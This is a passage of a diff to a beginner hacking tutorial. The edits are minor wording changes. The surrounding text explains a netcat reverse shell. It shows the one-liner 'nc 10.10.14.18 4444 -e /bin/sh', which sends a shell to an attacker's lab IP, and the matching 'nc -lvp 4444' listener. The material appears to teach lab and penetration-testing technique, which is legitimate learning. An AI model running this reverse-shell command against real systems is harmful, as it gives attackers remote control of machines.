chryzsh/practical-hacking/part-1-how-to-hack.md

 nc 10.10.14.18 4444 -e /bin/sh
 ```

 This executes netcat and connects to the IP address 10.10.14.18 on the port 4444, executing `/bin/sh` - one of the many shells on the linux system.
-If we did this without a listener, nothing would happen.
+If we did this without a listener nothing would happen.
 We need something listening on our host with IP 10.10.14.18 on the port 4444.
 For this we use the following command:

 ```text
 nc -lvp 4444
 ```

 The -l is for listener, -v is for verbose and the -p is for port.
-Consequently this command starts a listener on your Kali machine on port 4444.
+This command starts a listener on your Kali machine on port 4444.
 Whenever the payload tries to connect to your IP address on this port with `nc` or a payload, it will "catch" the shell and you will get a terminal on the target.
 From there you are able to execute commands on the target.
 See the figure below for a basic example on how this works.

 ![Basic reverse shell and listener example](.gitbook/assets/image%20%2850%29.png)